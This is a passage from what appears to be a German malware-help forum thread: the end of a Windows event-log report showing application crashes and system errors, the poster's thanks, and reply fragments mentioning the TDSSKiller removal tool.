Error - 02.06.2013 11:09:38 | Computer Name = ant-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung SynTPEnh.exe, Version 10.0.15.0, Zeitstempel
0x46e19971, fehlerhaftes Modul SynTPEnh.exe, Version 10.0.15.0, Zeitstempel 0x46e19971,
Ausnahmecode 0xc0000409, Fehleroffset 0x000289dc, Prozess-ID 0x10b8, Anwendungsstartzeit
01ce5f914251a286.
Error - 02.06.2013 11:12:37 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
[ OSession Events ]
Error - 05.05.2010 04:27:04 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 11368
seconds with 1020 seconds of active time. This session ended with a crash.
Error - 15.06.2012 05:27:36 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 10
seconds with 0 seconds of active time. This session ended with a crash.
Error - 11.09.2012 10:42:12 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1055
seconds with 960 seconds of active time. This session ended with a crash.
Error - 11.09.2012 11:20:17 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2260
seconds with 1500 seconds of active time. This session ended with a crash.
Error - 11.03.2013 09:29:25 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3508
seconds with 2040 seconds of active time. This session ended with a crash.
[ System Events ]
Error - 14.08.2009 16:07:32 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 15.08.2009 13:08:09 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 15.08.2009 13:09:04 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
Error - 15.08.2009 13:13:45 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 15.08.2009 19:24:03 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 16.08.2009 15:56:43 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 16.08.2009 15:57:10 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
Error - 16.08.2009 18:05:00 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 17.08.2009 03:11:20 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 17.08.2009 03:11:42 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
< End of report >
Ich hoffe das sind alle Daten die Ihr braucht und dass ich auch nicht zu viel davon gepostet habe... Für jede Antwort oder Hilfestellung schon im Voraus vielen Dank! |
TDSSKiller.exe und speichere diese Datei auf dem Desktop
Textbox. 
WARNUNG an die MITLESER: